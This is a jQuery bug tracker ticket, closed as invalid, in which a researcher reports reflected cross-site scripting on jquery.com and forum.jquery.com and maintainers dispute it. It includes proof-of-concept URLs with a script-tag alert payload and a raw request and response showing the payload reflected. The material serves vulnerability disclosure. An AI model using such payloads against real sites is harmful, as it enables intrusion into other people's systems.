Context Navigation

← Previous Ticket
Next Ticket →

#7509 closed bug (invalid)

Report of XSS in jquery.com

Reported by:	h02332@…	Owned by:	jdsharp
Priority:	undecided	Milestone:	1.5
Component:	web	Version:	1.4.4
Keywords:		Cc:
Blocked by:		Blocking:

Description

Report of XSS in forum.query.com and jquery.com, etc.

We tried to make a few private contacts but received no response. We've fingerprinted Cross Site Scripting and provide a Forum Poc:

http://forum.jquery.com/?d53cd"><script>alert(1)</script>f59c917a6e7=1

Also provided is a jquery.com PoC:

http://jquery.com/?d53cd"><script>alert(1)</script>f59c917a6e7=1

As noted, this can be reproduced en mass.

We'd appreciate someone from the jquery team sending us email to h02332
@
/ gmail
.\ com as we have a number of bugs to provide privately.

Thank You.

Hoyt LLC Research

Change History (12)

comment:1 Changed 7 years ago by addyosmani

Component:	unfiled → web
Owner:	set to jdsharp

comment:2 Changed 7 years ago by dmethvin

#7510 is a duplicate of this ticket.

comment:3 Changed 7 years ago by dmethvin

#7511 is a duplicate of this ticket.

comment:4 Changed 7 years ago by dmethvin

#7512 is a duplicate of this ticket.

comment:5 Changed 7 years ago by dmethvin

#7513 is a duplicate of this ticket.

comment:6 Changed 7 years ago by dmethvin

#7514 is a duplicate of this ticket.

comment:7 Changed 7 years ago by dmethvin

#7515 is a duplicate of this ticket.

comment:8 Changed 7 years ago by dmethvin

#7516 is a duplicate of this ticket.

comment:9 Changed 7 years ago by SlexAxton

Status:	new → assigned

comment:10 Changed 7 years ago by snover

Resolution:	→ invalid
Status:	assigned → closed

None of these reports are valid. Just because IE says it’s “changed the page” to prevent XSS doesn’t mean there is actually a vulnerability on the page, and in these cases, there was indeed no vulnerability.

comment:11 Changed 7 years ago by anonymous

Hello-

This is the first update we've seen on this ticket.. we don't publish live PoC's for frameworks.. however, some additional info can help..

Request GET /?d53cd"><script>alert(1)</script>f59c917a6e7=1 HTTP/1.1 Host: forum.jquery.com

Response HTTP/1.1 200 OK Set-Cookie: zdccn=ba2a8341-6714-4548-ba38-cb44b081796e; Path=/ <head> <link rel="SH ...[SNIP]... <a href="/portalLogin.do?serviceurl=/?d53cd"><script>alert(1)</script>f59c917a6e7=1&forumGroupUrl=jquery"> ...[SNIP]...

This is JqueryUI ... cookies too.. http://cloudscan.blogspot.com/2010/11/jqueryuicom-cross-site-scripting.html

From the looks of this ticket, it doesn't look like more info is requested, so we'll publish the data. Sorry you didn't find the info useful.

comment:12 Changed 7 years ago by snover

forum.jquery.com is not our property. We have no control over the code. You should talk to Zoho about that.

Note: See TracTickets for help on using tickets.

Download in other formats:

Bug Tracker